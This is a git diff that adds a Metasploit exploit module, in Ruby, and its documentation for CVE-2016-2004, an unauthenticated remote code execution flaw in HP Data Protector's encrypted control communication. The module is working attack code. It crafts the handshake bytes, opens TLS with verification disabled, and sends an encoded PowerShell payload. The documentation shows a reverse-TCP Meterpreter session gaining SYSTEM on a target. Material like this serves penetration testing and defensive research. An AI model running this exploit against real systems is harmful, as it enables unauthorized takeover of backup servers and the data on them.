diff --git a/documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md b/documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md new file mode 100644 index 0000000000..a72b649bff --- /dev/null +++ b/documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md @@ -0,0 +1,75 @@ +HP Data Protector is an automated backup and recovery software for single-server to enterprise +environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix, +and Linux operating systems. + +While the server is using Encrypted Control Communication, HP Data Protector allows a remote +attacker to gain access without authentication, and gain arbitrary code execution under the +context of SYSTEM. + + +## Vulnerable Application + +HP Data Protector versions 7, 8, and 9 are known to be affected. + +hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008. + +## Verification Steps + +**Installing HP Data Protector** + +Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested +against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8). + +After setting up the domain controller, double-click on the HP Data Protector installer, and you +should see this screen: + +![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png) + +Click on **Install Data Protector**. And then the installer should ask you which installation type: + +![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png) + +Make sure to select **Cell Manager**, and click **Next**. Use all default settings. + +**Enabling Encrypted Communication** + +After the Setup Wizard is finished, we need to enable encrypted communication. First, open the +Data Protector GUI: + +![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png) + +Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the +right, click on that. + +![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png) + +Under the Connection tab, there should be an **Encrypted control communication** checkbox, make +sure that is checked. And then click **Apply** + +**Using hp_dataprotector_encrypted_comms** + +After the encrypted communication is enabled, you are ready to use +hp_dataprotector_encrypted_comms. Here is what you do: + +1. Start msfconsole +2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms``` +3. Do: ```set RHOST [IP ADDRESS]``` +4. Do: ```set PAYLOAD [PAYLOAD NAME]``` +5. Set other options as needed +6. Do: ```exploit```, and you should receive a session like the following: + +``` +msf exploit(hp_dataprotector_encrypted_comms) > run + +[*] Started reverse TCP handler on 172.16.23.1:4444 +[*] 172.16.23.173:5555 - Initiating connection +[*] 172.16.23.173:5555 - Establishing encrypted channel +[*] 172.16.23.173:5555 - Sending payload +[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so) +[*] Sending stage (957999 bytes) to 172.16.23.173 +[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500 + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +``` + diff --git a/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb b/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb new file mode 100644 index 0000000000..64258c69ac --- /dev/null +++ b/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb @@ -0,0 +1,150 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/exploit/powershell' +require 'openssl' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Powershell + + def initialize(info={}) + super(update_info(info, + 'Name' => "HP Data Protector Encrypted Communication Remote Command Execution", + 'Description' => %q{ + This module exploits a well known remote code execution exploit after establishing encrypted + control communications with a Data Protector agent. This allows exploitation of Data + Protector agents that have been configured to only use encrypted control communications. + + This exploit works by executing the payload with Microsoft PowerShell so will only work + against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows + Server 2008 R2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jon Barg', # Reported vuln (originally discovery?) credited by HP + 'Ian Lovering' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2016-2004' ], + [ 'URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988' ] + ], + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ] + ], + 'Payload' => + { + 'BadChars' => "\x00" + }, + 'DefaultOptions' => + { + 'WfsDelay' => 30, + 'RPORT' => 5555 + }, + 'Privileged' => false, + 'DisclosureDate' => "Apr 18 2016", + 'DefaultTarget' => 0)) + end + + def check + # For the check command + connect + sock.put(rand_text_alpha_upper(64)) + response = sock.get_once(-1) + disconnect + + if response.nil? + return Exploit::CheckCode::Safe + end + + service_version = Rex::Text.to_ascii(response).chop.chomp + + if service_version =~ /HP Data Protector/ + vprint_status(service_version) + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + + end + + def generate_dp_payload + command = cmd_psh_payload( + payload.encoded, + payload_instance.arch.first, + { remove_comspec: true, encode_final_payload: true }) + + payload = + "\x32\x00\x01\x01\x01\x01\x01\x01" + + "\x00\x01\x00\x01\x00\x01\x00\x01" + + "\x01\x00\x20\x32\x38\x00\x5c\x70" + + "\x65\x72\x6c\x2e\x65\x78\x65\x00" + + "\x20\x2d\x65\x73\x79\x73\x74\x65" + + "\x6d('#{command}')\x00" + + payload_length = [payload.length].pack('N') + + return payload_length + payload + end + + def exploit + # Main function + encryption_init_data = + "\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" + + "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" + + "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" + + "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" + + "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00" + + print_status("Initiating connection") + + # Open connection + connect + + # Send init data + sock.put(encryption_init_data) + begin + buf = sock.get_once + rescue ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + end + + print_status("Establishing encrypted channel") + + # Create TLS / SSL context + sock.extend(Rex::Socket::SslTcp) + sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23) + sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE + + sock.sslctx.options = OpenSSL::SSL::OP_ALL + + # Enable all ciphers as older versions of Data Protector only use + # some not enabled by default + sock.sslctx.ciphers = "ALL" + + # Enable TLS / SSL + sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx) + sock.sslsock.connect + + print_status("Sending payload") + + # Send payload + sock.put(generate_dp_payload(), {timeout: 5}) + + # Close socket + disconnect + + print_status("Waiting for payload execution (this can take up to 30 seconds or so)") + end + +end +